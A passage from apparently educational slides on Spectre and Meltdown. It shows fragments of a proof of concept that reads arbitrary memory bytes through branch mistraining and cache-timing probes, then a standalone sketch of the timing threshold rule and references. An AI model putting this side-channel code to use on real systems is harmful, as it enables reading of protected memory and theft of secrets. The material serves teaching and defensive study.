          addr = addr != 0 ? addr : (uint64_t)&secret;
          /* Opened so that read_any_byte() can issue a system call via pread(). */
          if ((fd = open("/proc/version", O_RDONLY)) < 0)
              perror("Error opening /proc/version");
          /* Dump bytes until a zero byte is read. */
          do {
              byte = read_any_byte(addr);
              printf("0x%" PRIx64 " = 0x%x ('%c')\n", addr++, byte, byte);
          } while (byte != 0);
          return 0;
      }
    Full source: https://github.com/berestovskyy/spectre-meltdown
  • 74. Read Any Byte()
      uint8_t read_any_byte(uint64_t addr) {
          size_t tries, i, sum = 0, cnt = 0, mins[BYTE_VALUES];
          addr -= (uint64_t)&base_array;
          for (i = 0; i < BYTE_VALUES; i++)
              mins[i] = SIZE_MAX;
          for (tries = 0; tries < MIN_READS * 5; tries++) {
              char buf[PAGE_SIZE];
              if (fd > 0 && pread(fd, &buf, sizeof(buf), 0) < 0)
                  perror("Error reading /proc/version");
              ...
          }
          return 0;
      }
    Shown separately on the slide:
      for (i = 1; i <= BRANCH_TRAINS * 4; i++) {
          _mm_clflush(&array_size);
          sched_yield();
          tmp = bounds_check(addr & (i % BRANCH_TRAINS - 1));
      }
      for (i = 1; i < BYTE_VALUES; i++) {
          __sync_synchronize();
          register uint64_t start_tsc = __rdtsc();
          tmp = side_effects[i * PAGE_SIZE];
          __sync_synchronize();
          register uint64_t cycles = __rdtsc() - start_tsc;
          _mm_clflush(&side_effects[i * PAGE_SIZE]);
          if (cycles > MAX_READ_CYCLES)
              break;
          else if (cycles < mins[i])
              mins[i] = cycles;
          if (cnt > MIN_READS && mins[i] < sum / cnt * 2 / 3)
              return i;
          sum += cycles;
          cnt++;
      }
    Full source: https://github.com/berestovskyy/spectre-meltdown
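The timing loop above decides that byte value i was cached once the fastest latency seen for i drops below two thirds of the running average latency, and only after more than MIN_READS samples have been collected. Below is a minimal sketch of that decision rule, isolated from the hardware so it can be exercised with synthetic latencies. The struct probe_stats and both functions are hypothetical names. Unlike the PoC, which breaks out of the scan when a sample exceeds MAX_READ_CYCLES, this sketch simply ignores that sample.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define MIN_READS 100
#define MAX_READ_CYCLES 1000
#define BYTE_VALUES 256

struct probe_stats {
    size_t sum;               /* sum of accepted latencies, in cycles */
    size_t cnt;               /* number of accepted latencies */
    size_t mins[BYTE_VALUES]; /* fastest latency seen per byte value */
};

void probe_stats_init(struct probe_stats *s)
{
    s->sum = 0;
    s->cnt = 0;
    for (size_t i = 0; i < BYTE_VALUES; i++)
        s->mins[i] = SIZE_MAX;
}

/* Feeds one latency sample for byte value i.
 * Returns true when i looks like a cache hit under the slide's rule. */
bool probe_stats_update(struct probe_stats *s, size_t i, size_t cycles)
{
    assert(i < BYTE_VALUES);
    if (cycles > MAX_READ_CYCLES)
        return false; /* outlier, e.g. an interrupt; the PoC restarts the scan */
    if (cycles < s->mins[i])
        s->mins[i] = cycles;
    /* cnt is checked first, so the division never sees cnt == 0 */
    if (s->cnt > MIN_READS && s->mins[i] < s->sum / s->cnt * 2 / 3)
        return true;
    s->sum += cycles;
    s->cnt++;
    return false;
}
```

With 150 samples of 300 cycles the threshold is 300 * 2 / 3 = 200 cycles, so a later 80-cycle sample for one byte value is reported as a hit. Comparing against a running average rather than a fixed cycle count means no machine-specific latency constant is needed.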
  • 75. References
    1. Meltdown and Spectre: https://meltdownattack.com/
    2. Spectre Attacks: Exploiting Speculative Execution, by Paul Kocher et al.: https://spectreattack.com/spectre.pdf
    3. Meltdown, by Moritz Lipp et al.: https://meltdownattack.com/meltdown.pdf
    4. ARM Developer. Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism: https://developer.arm.com/support/security-update
    5. Intel Software Developer Manuals: https://software.intel.com/en-us/articles/intel-sdm
    6. Spectre-based Meltdown proof of concept in just 99 lines of code: https://github.com/berestovskyy/spectre-meltdown